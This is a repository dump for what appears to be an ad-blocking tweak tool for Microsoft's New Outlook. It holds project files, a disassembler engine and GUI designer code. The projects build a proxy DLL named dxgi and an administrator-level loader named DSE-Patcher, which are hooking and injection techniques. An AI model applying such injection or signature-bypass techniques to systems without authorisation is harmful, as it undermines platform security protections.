*.binlog 345 | 346 | # NVidia Nsight GPU debugger configuration file 347 | *.nvuser 348 | 349 | # MFractors (Xamarin productivity tool) working folder 350 | .mfractor/ 351 | 352 | # Local History for Visual Studio 353 | .localhistory/ 354 | 355 | # BeatPulse healthcheck temp database 356 | healthchecksdb 357 | 358 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 359 | MigrationBackup/ 360 | 361 | # Ionide (cross platform F# VS Code tools) working folder 362 | .ionide/ 363 | 364 | # Fody - auto-generated XML schema 365 | FodyWeavers.xsd -------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {AAFAF49F-EE20-4E9F-AE53-5254457AB141} 23 | Win32Proj 24 | DSEPatcher 25 | loader2 26 | 27 | 28 | 29 | Application 30 | true 31 | MultiByte 32 | v143 33 | 34 | 35 | Application 36 | true 37 | MultiByte 38 | v143 39 | 40 | 41 | Application 42 | false 43 | true 44 | MultiByte 45 | v143 46 | 47 | 48 | Application 49 | false 50 | true 51 | MultiByte 52 | v143 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | true 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | false 79 | 80 | 81 | false 82 | true 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 91 | 92 | 93 | Windows 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level4 102 | Disabled 103 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 104 | 105 | 106 | Windows 107 | true 108 | RequireAdministrator 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MinSpace 117 | true 118 | false 119 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 120 | Size 121 | false 122 | 123 | 124 | Windows 125 | false 126 | true 127 | true 128 | msvcrt.lib;comctl32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 129 | true 130 | 131 | 132 | 133 | 134 | Level4 135 | 136 | 137 | MinSpace 138 | true 139 | false 140 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 141 | Size 142 | false 143 | 144 | 145 | Windows 146 | false 147 | true 148 | true 149 | true 150 | msvcrt.lib;shlwapi.lib;newdev.lib;setupapi.lib;comctl32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 151 | RequireAdministrator 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | -------------------------------------------------------------------------------- /NOP/worker/worker.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Debug 7 | Win32 8 | 9 | 10 | Release 11 | Win32 12 | 13 | 14 | Debug 15 | x64 16 | 17 | 18 | Release 19 | x64 20 | 21 | 22 | 23 | 17.0 24 | Win32Proj 25 | {8480da70-45e9-4d91-a89c-24b27d0f4924} 26 | worker 27 | 10.0 28 | 29 | 30 | 31 | DynamicLibrary 32 | true 33 | v143 34 | Unicode 35 | 36 | 37 | DynamicLibrary 38 | false 39 | v143 40 | true 41 | Unicode 42 | 43 | 44 | DynamicLibrary 45 | true 46 | v143 47 | Unicode 48 | 49 | 50 | DynamicLibrary 51 | false 52 | v143 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | dxgi 76 | 77 | 78 | dxgi 79 | 80 | 81 | dxgi 82 | 83 | 84 | dxgi 85 | 86 | 87 | 88 | Level3 89 | true 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | true 92 | stdcpplatest 93 | true 94 | MultiThreadedDebug 95 | 96 | 97 | Console 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | true 106 | true 107 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | stdcpplatest 110 | true 111 | MultiThreaded 112 | 113 | 114 | Console 115 | true 116 | true 117 | true 118 | 119 | 120 | 121 | 122 | Level3 123 | true 124 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | stdcpplatest 127 | true 128 | MultiThreadedDebug 129 | 130 | 131 | Console 132 | true 133 | 134 | 135 | 136 | 137 | Level3 138 | true 139 | true 140 | true 141 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 142 | true 143 | stdcpplatest 144 | true 145 | MultiThreaded 146 | 147 | 148 | Console 149 | true 150 | true 151 | true 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 169 | 170 | 171 | 172 | 173 | 174 | 175 | -------------------------------------------------------------------------------- /hde/hde64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #include "hde64.h" 9 | #include "table64.h" 10 | 11 | #pragma warning(push) 12 | #pragma warning(disable:4701) 13 | #pragma warning(disable:4706) 14 | 15 | unsigned int hde64_disasm(const void *code, hde64s *hs) 16 | { 17 | uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0; 18 | uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; 19 | uint8_t op64 = 0; 20 | 21 | // Avoid using memset to reduce the footprint. 22 | #ifndef _MSC_VER 23 | memset((uint8_t*)hs, 0, sizeof(hde64s)); 24 | #else 25 | __stosb((uint8_t*)hs, 0, sizeof(hde64s)); 26 | #endif 27 | 28 | for (x = 16; x; x--) 29 | switch (c = *p++) { 30 | case 0xf3: 31 | hs->p_rep = c; 32 | pref |= PRE_F3; 33 | break; 34 | case 0xf2: 35 | hs->p_rep = c; 36 | pref |= PRE_F2; 37 | break; 38 | case 0xf0: 39 | hs->p_lock = c; 40 | pref |= PRE_LOCK; 41 | break; 42 | case 0x26: case 0x2e: case 0x36: 43 | case 0x3e: case 0x64: case 0x65: 44 | hs->p_seg = c; 45 | pref |= PRE_SEG; 46 | break; 47 | case 0x66: 48 | hs->p_66 = c; 49 | pref |= PRE_66; 50 | break; 51 | case 0x67: 52 | hs->p_67 = c; 53 | pref |= PRE_67; 54 | break; 55 | default: 56 | goto pref_done; 57 | } 58 | pref_done: 59 | 60 | hs->flags = (uint32_t)pref << 23; 61 | 62 | if (!pref) 63 | pref |= PRE_NONE; 64 | 65 | if ((c & 0xf0) == 0x40) { 66 | hs->flags |= F_PREFIX_REX; 67 | if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) 68 | op64++; 69 | hs->rex_r = (c & 7) >> 2; 70 | hs->rex_x = (c & 3) >> 1; 71 | hs->rex_b = c & 1; 72 | if (((c = *p++) & 0xf0) == 0x40) { 73 | opcode = c; 74 | goto error_opcode; 75 | } 76 | } 77 | 78 | if ((hs->opcode = c) == 0x0f) { 79 | hs->opcode2 = c = *p++; 80 | ht += DELTA_OPCODES; 81 | } else if (c >= 0xa0 && c <= 0xa3) { 82 | op64++; 83 | if (pref & PRE_67) 84 | pref |= PRE_66; 85 | else 86 | pref &= ~PRE_66; 87 | } 88 | 89 | opcode = c; 90 | cflags = ht[ht[opcode / 4] + (opcode % 4)]; 91 | 92 | if (cflags == C_ERROR) { 93 | error_opcode: 94 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 95 | cflags = 0; 96 | if ((opcode & -3) == 0x24) 97 | cflags++; 98 | } 99 | 100 | x = 0; 101 | if (cflags & C_GROUP) { 102 | uint16_t t; 103 | t = *(uint16_t *)(ht + (cflags & 0x7f)); 104 | cflags = (uint8_t)t; 105 | x = (uint8_t)(t >> 8); 106 | } 107 | 108 | if (hs->opcode2) { 109 | ht = hde64_table + DELTA_PREFIXES; 110 | if (ht[ht[opcode / 4] + (opcode % 4)] & pref) 111 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 112 | } 113 | 114 | if (cflags & C_MODRM) { 115 | hs->flags |= F_MODRM; 116 | hs->modrm = c = *p++; 117 | hs->modrm_mod = m_mod = c >> 6; 118 | hs->modrm_rm = m_rm = c & 7; 119 | hs->modrm_reg = m_reg = (c & 0x3f) >> 3; 120 | 121 | if (x && ((x << m_reg) & 0x80)) 122 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 123 | 124 | if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { 125 | uint8_t t = opcode - 0xd9; 126 | if (m_mod == 3) { 127 | ht = hde64_table + DELTA_FPU_MODRM + t*8; 128 | t = ht[m_reg] << m_rm; 129 | } else { 130 | ht = hde64_table + DELTA_FPU_REG; 131 | t = ht[t] << m_reg; 132 | } 133 | if (t & 0x80) 134 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 135 | } 136 | 137 | if (pref & PRE_LOCK) { 138 | if (m_mod == 3) { 139 | hs->flags |= F_ERROR | F_ERROR_LOCK; 140 | } else { 141 | uint8_t *table_end, op = opcode; 142 | if (hs->opcode2) { 143 | ht = hde64_table + DELTA_OP2_LOCK_OK; 144 | table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; 145 | } else { 146 | ht = hde64_table + DELTA_OP_LOCK_OK; 147 | table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; 148 | op &= -2; 149 | } 150 | for (; ht != table_end; ht++) 151 | if (*ht++ == op) { 152 | if (!((*ht << m_reg) & 0x80)) 153 | goto no_lock_error; 154 | else 155 | break; 156 | } 157 | hs->flags |= F_ERROR | F_ERROR_LOCK; 158 | no_lock_error: 159 | ; 160 | } 161 | } 162 | 163 | if (hs->opcode2) { 164 | switch (opcode) { 165 | case 0x20: case 0x22: 166 | m_mod = 3; 167 | if (m_reg > 4 || m_reg == 1) 168 | goto error_operand; 169 | else 170 | goto no_error_operand; 171 | case 0x21: case 0x23: 172 | m_mod = 3; 173 | if (m_reg == 4 || m_reg == 5) 174 | goto error_operand; 175 | else 176 | goto no_error_operand; 177 | } 178 | } else { 179 | switch (opcode) { 180 | case 0x8c: 181 | if (m_reg > 5) 182 | goto error_operand; 183 | else 184 | goto no_error_operand; 185 | case 0x8e: 186 | if (m_reg == 1 || m_reg > 5) 187 | goto error_operand; 188 | else 189 | goto no_error_operand; 190 | } 191 | } 192 | 193 | if (m_mod == 3) { 194 | uint8_t *table_end; 195 | if (hs->opcode2) { 196 | ht = hde64_table + DELTA_OP2_ONLY_MEM; 197 | table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; 198 | } else { 199 | ht = hde64_table + DELTA_OP_ONLY_MEM; 200 | table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; 201 | } 202 | for (; ht != table_end; ht += 2) 203 | if (*ht++ == opcode) { 204 | if (*ht++ & pref && !((*ht << m_reg) & 0x80)) 205 | goto error_operand; 206 | else 207 | break; 208 | } 209 | goto no_error_operand; 210 | } else if (hs->opcode2) { 211 | switch (opcode) { 212 | case 0x50: case 0xd7: case 0xf7: 213 | if (pref & (PRE_NONE | PRE_66)) 214 | goto error_operand; 215 | break; 216 | case 0xd6: 217 | if (pref & (PRE_F2 | PRE_F3)) 218 | goto error_operand; 219 | break; 220 | case 0xc5: 221 | goto error_operand; 222 | } 223 | goto no_error_operand; 224 | } else 225 | goto no_error_operand; 226 | 227 | error_operand: 228 | hs->flags |= F_ERROR | F_ERROR_OPERAND; 229 | no_error_operand: 230 | 231 | c = *p++; 232 | if (m_reg <= 1) { 233 | if (opcode == 0xf6) 234 | cflags |= C_IMM8; 235 | else if (opcode == 0xf7) 236 | cflags |= C_IMM_P66; 237 | } 238 | 239 | switch (m_mod) { 240 | case 0: 241 | if (pref & PRE_67) { 242 | if (m_rm == 6) 243 | disp_size = 2; 244 | } else 245 | if (m_rm == 5) 246 | disp_size = 4; 247 | break; 248 | case 1: 249 | disp_size = 1; 250 | break; 251 | case 2: 252 | disp_size = 2; 253 | if (!(pref & PRE_67)) 254 | disp_size <<= 1; 255 | } 256 | 257 | if (m_mod != 3 && m_rm == 4) { 258 | hs->flags |= F_SIB; 259 | p++; 260 | hs->sib = c; 261 | hs->sib_scale = c >> 6; 262 | hs->sib_index = (c & 0x3f) >> 3; 263 | if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) 264 | disp_size = 4; 265 | } 266 | 267 | p--; 268 | switch (disp_size) { 269 | case 1: 270 | hs->flags |= F_DISP8; 271 | hs->disp.disp8 = *p; 272 | break; 273 | case 2: 274 | hs->flags |= F_DISP16; 275 | hs->disp.disp16 = *(uint16_t *)p; 276 | break; 277 | case 4: 278 | hs->flags |= F_DISP32; 279 | hs->disp.disp32 = *(uint32_t *)p; 280 | } 281 | p += disp_size; 282 | } else if (pref & PRE_LOCK) 283 | hs->flags |= F_ERROR | F_ERROR_LOCK; 284 | 285 | if (cflags & C_IMM_P66) { 286 | if (cflags & C_REL32) { 287 | if (pref & PRE_66) { 288 | hs->flags |= F_IMM16 | F_RELATIVE; 289 | hs->imm.imm16 = *(uint16_t *)p; 290 | p += 2; 291 | goto disasm_done; 292 | } 293 | goto rel32_ok; 294 | } 295 | if (op64) { 296 | hs->flags |= F_IMM64; 297 | hs->imm.imm64 = *(uint64_t *)p; 298 | p += 8; 299 | } else if (!(pref & PRE_66)) { 300 | hs->flags |= F_IMM32; 301 | hs->imm.imm32 = *(uint32_t *)p; 302 | p += 4; 303 | } else 304 | goto imm16_ok; 305 | } 306 | 307 | 308 | if (cflags & C_IMM16) { 309 | imm16_ok: 310 | hs->flags |= F_IMM16; 311 | hs->imm.imm16 = *(uint16_t *)p; 312 | p += 2; 313 | } 314 | if (cflags & C_IMM8) { 315 | hs->flags |= F_IMM8; 316 | hs->imm.imm8 = *p++; 317 | } 318 | 319 | if (cflags & C_REL32) { 320 | rel32_ok: 321 | hs->flags |= F_IMM32 | F_RELATIVE; 322 | hs->imm.imm32 = *(uint32_t *)p; 323 | p += 4; 324 | } else if (cflags & C_REL8) { 325 | hs->flags |= F_IMM8 | F_RELATIVE; 326 | hs->imm.imm8 = *p++; 327 | } 328 | 329 | disasm_done: 330 | 331 | if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { 332 | hs->flags |= F_ERROR | F_ERROR_LENGTH; 333 | hs->len = 15; 334 | } 335 | 336 | return (unsigned int)hs->len; 337 | } 338 | #pragma warning(pop) 339 | -------------------------------------------------------------------------------- /NOP/loader2/hde64.c: -------------------------------------------------------------------------------- 1 | 2 | // disable lint warnings for complete source code file 3 | //lint -e416 Warning 416: Likely creation of out-of-bounds pointer 4 | //lint -e801 Warning 801: Use of goto is deprecated 5 | //lint -e701 Warning 701: Shift left of signed quantity (int) 6 | //lint -e734 Warning 734: Loss of precision (assignment) (31 bits to 8 bits) 7 | //lint -e744 Warning 744: switch statement has no default 8 | //lint -e820 Warning 820: Boolean test of a parenthesized assignment 9 | //lint -e826 Warning 826: Suspicious pointer-to-pointer conversion (area too small) 10 | //lint -e830 Warning 830: Location cited in prior message 11 | //lint -e850 Warning 850: for loop index variable 'ht' whose type category is 'string' is modified in body of the for loop 12 | //lint -e952 Warning 952: Parameter could be declared const --- Eff. C++ 3rd Ed. item 3 13 | //lint -e954 Warning 954: Pointer variable could be declared as pointing to const --- Eff. C++ 3rd Ed. item 3 14 | 15 | /* 16 | * Hacker Disassembler Engine 64 C 17 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 18 | * All rights reserved. 19 | * 20 | */ 21 | 22 | #include "hde64.h" 23 | #include "table64.h" 24 | 25 | // Warning C4706: assignment within conditional expression 26 | #pragma warning(disable:4706) 27 | 28 | unsigned int hde64_disasm(const void *code, hde64s *hs) 29 | { 30 | uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0; 31 | uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; 32 | uint8_t op64 = 0; 33 | 34 | memset((LPBYTE)hs, 0, sizeof(hde64s)); 35 | 36 | for (x = 16; x; x--) 37 | switch (c = *p++) { 38 | case 0xf3: 39 | hs->p_rep = c; 40 | pref |= PRE_F3; 41 | break; 42 | case 0xf2: 43 | hs->p_rep = c; 44 | pref |= PRE_F2; 45 | break; 46 | case 0xf0: 47 | hs->p_lock = c; 48 | pref |= PRE_LOCK; 49 | break; 50 | case 0x26: case 0x2e: case 0x36: 51 | case 0x3e: case 0x64: case 0x65: 52 | hs->p_seg = c; 53 | pref |= PRE_SEG; 54 | break; 55 | case 0x66: 56 | hs->p_66 = c; 57 | pref |= PRE_66; 58 | break; 59 | case 0x67: 60 | hs->p_67 = c; 61 | pref |= PRE_67; 62 | break; 63 | default: 64 | goto pref_done; 65 | } 66 | pref_done: 67 | 68 | hs->flags = (uint32_t)pref << 23; 69 | 70 | if (!pref) 71 | pref |= PRE_NONE; 72 | 73 | if ((c & 0xf0) == 0x40) { 74 | hs->flags |= F_PREFIX_REX; 75 | if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) 76 | op64++; 77 | hs->rex_r = (c & 7) >> 2; 78 | hs->rex_x = (c & 3) >> 1; 79 | hs->rex_b = c & 1; 80 | if (((c = *p++) & 0xf0) == 0x40) { 81 | opcode = c; 82 | goto error_opcode; 83 | } 84 | } 85 | 86 | if ((hs->opcode = c) == 0x0f) { 87 | hs->opcode2 = c = *p++; 88 | ht += DELTA_OPCODES; 89 | } else if (c >= 0xa0 && c <= 0xa3) { 90 | op64++; 91 | if (pref & PRE_67) 92 | pref |= PRE_66; 93 | else 94 | pref &= ~PRE_66; 95 | } 96 | 97 | opcode = c; 98 | cflags = ht[ht[opcode / 4] + (opcode % 4)]; 99 | 100 | if (cflags == C_ERROR) { 101 | error_opcode: 102 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 103 | cflags = 0; 104 | if ((opcode & -3) == 0x24) 105 | cflags++; 106 | } 107 | 108 | x = 0; 109 | if (cflags & C_GROUP) { 110 | uint16_t t; 111 | t = *(uint16_t *)(ht + (cflags & 0x7f)); 112 | cflags = (uint8_t)t; 113 | x = (uint8_t)(t >> 8); 114 | } 115 | 116 | if (hs->opcode2) { 117 | ht = hde64_table + DELTA_PREFIXES; 118 | if (ht[ht[opcode / 4] + (opcode % 4)] & pref) 119 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 120 | } 121 | 122 | if (cflags & C_MODRM) { 123 | hs->flags |= F_MODRM; 124 | hs->modrm = c = *p++; 125 | hs->modrm_mod = m_mod = c >> 6; 126 | hs->modrm_rm = m_rm = c & 7; 127 | hs->modrm_reg = m_reg = (c & 0x3f) >> 3; 128 | 129 | if (x && ((x << m_reg) & 0x80)) 130 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 131 | 132 | if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { 133 | uint8_t t = opcode - 0xd9; 134 | if (m_mod == 3) { 135 | ht = hde64_table + DELTA_FPU_MODRM + t*8; 136 | t = ht[m_reg] << m_rm; 137 | } else { 138 | ht = hde64_table + DELTA_FPU_REG; 139 | t = ht[t] << m_reg; 140 | } 141 | if (t & 0x80) 142 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 143 | } 144 | 145 | if (pref & PRE_LOCK) { 146 | if (m_mod == 3) { 147 | hs->flags |= F_ERROR | F_ERROR_LOCK; 148 | } else { 149 | uint8_t *table_end, op = opcode; 150 | if (hs->opcode2) { 151 | ht = hde64_table + DELTA_OP2_LOCK_OK; 152 | table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; 153 | } else { 154 | ht = hde64_table + DELTA_OP_LOCK_OK; 155 | table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; 156 | op &= -2; 157 | } 158 | for (; ht != table_end; ht++) 159 | if (*ht++ == op) { 160 | if (!((*ht << m_reg) & 0x80)) 161 | goto no_lock_error; 162 | else 163 | break; 164 | } 165 | hs->flags |= F_ERROR | F_ERROR_LOCK; 166 | no_lock_error: 167 | ; 168 | } 169 | } 170 | 171 | if (hs->opcode2) { 172 | switch (opcode) { 173 | case 0x20: case 0x22: 174 | m_mod = 3; 175 | if (m_reg > 4 || m_reg == 1) 176 | goto error_operand; 177 | else 178 | goto no_error_operand; 179 | case 0x21: case 0x23: 180 | m_mod = 3; 181 | if (m_reg == 4 || m_reg == 5) 182 | goto error_operand; 183 | else 184 | goto no_error_operand; 185 | } 186 | } else { 187 | switch (opcode) { 188 | case 0x8c: 189 | if (m_reg > 5) 190 | goto error_operand; 191 | else 192 | goto no_error_operand; 193 | case 0x8e: 194 | if (m_reg == 1 || m_reg > 5) 195 | goto error_operand; 196 | else 197 | goto no_error_operand; 198 | } 199 | } 200 | 201 | if (m_mod == 3) { 202 | uint8_t *table_end; 203 | if (hs->opcode2) { 204 | ht = hde64_table + DELTA_OP2_ONLY_MEM; 205 | table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; 206 | } else { 207 | ht = hde64_table + DELTA_OP_ONLY_MEM; 208 | table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; 209 | } 210 | for (; ht != table_end; ht += 2) 211 | if (*ht++ == opcode) { 212 | if ((*ht++ & pref) && !((*ht << m_reg) & 0x80)) 213 | goto error_operand; 214 | else 215 | break; 216 | } 217 | goto no_error_operand; 218 | } else if (hs->opcode2) { 219 | switch (opcode) { 220 | case 0x50: case 0xd7: case 0xf7: 221 | if (pref & (PRE_NONE | PRE_66)) 222 | goto error_operand; 223 | break; 224 | case 0xd6: 225 | if (pref & (PRE_F2 | PRE_F3)) 226 | goto error_operand; 227 | break; 228 | case 0xc5: 229 | goto error_operand; 230 | } 231 | goto no_error_operand; 232 | } else 233 | goto no_error_operand; 234 | 235 | error_operand: 236 | hs->flags |= F_ERROR | F_ERROR_OPERAND; 237 | no_error_operand: 238 | 239 | c = *p++; 240 | if (m_reg <= 1) { 241 | if (opcode == 0xf6) 242 | cflags |= C_IMM8; 243 | else if (opcode == 0xf7) 244 | cflags |= C_IMM_P66; 245 | } 246 | 247 | switch (m_mod) { 248 | case 0: 249 | if (pref & PRE_67) { 250 | if (m_rm == 6) 251 | disp_size = 2; 252 | } else 253 | if (m_rm == 5) 254 | disp_size = 4; 255 | break; 256 | case 1: 257 | disp_size = 1; 258 | break; 259 | case 2: 260 | disp_size = 2; 261 | if (!(pref & PRE_67)) 262 | disp_size <<= 1; 263 | break; 264 | } 265 | 266 | if (m_mod != 3 && m_rm == 4) { 267 | hs->flags |= F_SIB; 268 | p++; 269 | hs->sib = c; 270 | hs->sib_scale = c >> 6; 271 | hs->sib_index = (c & 0x3f) >> 3; 272 | if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) 273 | disp_size = 4; 274 | } 275 | 276 | p--; 277 | switch (disp_size) { 278 | case 1: 279 | hs->flags |= F_DISP8; 280 | hs->disp.disp8 = *p; 281 | break; 282 | case 2: 283 | hs->flags |= F_DISP16; 284 | hs->disp.disp16 = *(uint16_t *)p; 285 | break; 286 | case 4: 287 | hs->flags |= F_DISP32; 288 | hs->disp.disp32 = *(uint32_t *)p; 289 | break; 290 | } 291 | p += disp_size; 292 | } else if (pref & PRE_LOCK) 293 | hs->flags |= F_ERROR | F_ERROR_LOCK; 294 | 295 | if (cflags & C_IMM_P66) { 296 | if (cflags & C_REL32) { 297 | if (pref & PRE_66) { 298 | hs->flags |= F_IMM16 | F_RELATIVE; 299 | hs->imm.imm16 = *(uint16_t *)p; 300 | p += 2; 301 | goto disasm_done; 302 | } 303 | goto rel32_ok; 304 | } 305 | if (op64) { 306 | hs->flags |= F_IMM64; 307 | hs->imm.imm64 = *(uint64_t *)p; 308 | p += 8; 309 | } else if (!(pref & PRE_66)) { 310 | hs->flags |= F_IMM32; 311 | hs->imm.imm32 = *(uint32_t *)p; 312 | p += 4; 313 | } else 314 | goto imm16_ok; 315 | } 316 | 317 | 318 | if (cflags & C_IMM16) { 319 | imm16_ok: 320 | hs->flags |= F_IMM16; 321 | hs->imm.imm16 = *(uint16_t *)p; 322 | p += 2; 323 | } 324 | if (cflags & C_IMM8) { 325 | hs->flags |= F_IMM8; 326 | hs->imm.imm8 = *p++; 327 | } 328 | 329 | if (cflags & C_REL32) { 330 | rel32_ok: 331 | hs->flags |= F_IMM32 | F_RELATIVE; 332 | hs->imm.imm32 = *(uint32_t *)p; 333 | p += 4; 334 | } else if (cflags & C_REL8) { 335 | hs->flags |= F_IMM8 | F_RELATIVE; 336 | hs->imm.imm8 = *p++; 337 | } 338 | 339 | disasm_done: 340 | 341 | if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { 342 | hs->flags |= F_ERROR | F_ERROR_LENGTH; 343 | hs->len = 15; 344 | } 345 | 346 | return (unsigned int)hs->len; 347 | } 348 | 349 | -------------------------------------------------------------------------------- /NOP/gui/Form1.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace gui 2 | { 3 | partial class Form1 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | components = new System.ComponentModel.Container(); 32 | label1 = new Label(); 33 | txtPath = new TextBox(); 34 | label2 = new Label(); 35 | chkDisableFirstMailAd = new CheckBox(); 36 | chkDisableOneDriveBanner = new CheckBox(); 37 | chkDisableWordIcon = new CheckBox(); 38 | label3 = new Label(); 39 | chkDisableExcelIcon = new CheckBox(); 40 | chkDisablePowerPointIcon = new CheckBox(); 41 | chkDisableOneDriveIcon = new CheckBox(); 42 | chkDisableMoreAppsIcon = new CheckBox(); 43 | btnApplyRestart = new Button(); 44 | btnAbout = new Button(); 45 | timerCheckOutlook = new System.Windows.Forms.Timer(components); 46 | chkDisableAll = new CheckBox(); 47 | label4 = new Label(); 48 | chkF12 = new CheckBox(); 49 | label5 = new Label(); 50 | chkDisableToDoIcon = new CheckBox(); 51 | btnUninstall = new Button(); 52 | SuspendLayout(); 53 | // 54 | // label1 55 | // 56 | label1.AutoSize = true; 57 | label1.Location = new Point(7, 8); 58 | label1.Name = "label1"; 59 | label1.Size = new Size(163, 15); 60 | label1.TabIndex = 0; 61 | label1.Text = "New Outlook Install Location:"; 62 | // 63 | // txtPath 64 | // 65 | txtPath.Enabled = false; 66 | txtPath.Location = new Point(12, 26); 67 | txtPath.Multiline = true; 68 | txtPath.Name = "txtPath"; 69 | txtPath.Size = new Size(386, 58); 70 | txtPath.TabIndex = 1; 71 | // 72 | // label2 73 | // 74 | label2.AutoSize = true; 75 | label2.Location = new Point(7, 116); 76 | label2.Name = "label2"; 77 | label2.Size = new Size(83, 15); 78 | label2.TabIndex = 2; 79 | label2.Text = "Advertisments"; 80 | // 81 | // chkDisableFirstMailAd 82 | // 83 | chkDisableFirstMailAd.Checked = true; 84 | chkDisableFirstMailAd.CheckState = CheckState.Checked; 85 | chkDisableFirstMailAd.Location = new Point(12, 134); 86 | chkDisableFirstMailAd.Name = "chkDisableFirstMailAd"; 87 | chkDisableFirstMailAd.Size = new Size(386, 53); 88 | chkDisableFirstMailAd.TabIndex = 3; 89 | chkDisableFirstMailAd.Text = "Disable ad as first item in e-mails list\r\nThe first item in the mailbox is always an ad, unless you pay for Microsoft 365. Use this to only show real e-mails in the list."; 90 | chkDisableFirstMailAd.UseVisualStyleBackColor = true; 91 | chkDisableFirstMailAd.CheckedChanged += chkDisableAll_CheckedChanged; 92 | // 93 | // chkDisableOneDriveBanner 94 | // 95 | chkDisableOneDriveBanner.Checked = true; 96 | chkDisableOneDriveBanner.CheckState = CheckState.Checked; 97 | chkDisableOneDriveBanner.Location = new Point(12, 193); 98 | chkDisableOneDriveBanner.Name = "chkDisableOneDriveBanner"; 99 | chkDisableOneDriveBanner.Size = new Size(386, 55); 100 | chkDisableOneDriveBanner.TabIndex = 4; 101 | chkDisableOneDriveBanner.Text = "Disable OneDrive banner\r\nIn the lower left corner, a OneDrive ad is displayed, unless you pay for Microsoft 365. Use this to hide that advertisment banner."; 102 | chkDisableOneDriveBanner.UseVisualStyleBackColor = true; 103 | chkDisableOneDriveBanner.CheckedChanged += chkDisableAll_CheckedChanged; 104 | // 105 | // chkDisableWordIcon 106 | // 107 | chkDisableWordIcon.AutoSize = true; 108 | chkDisableWordIcon.Checked = 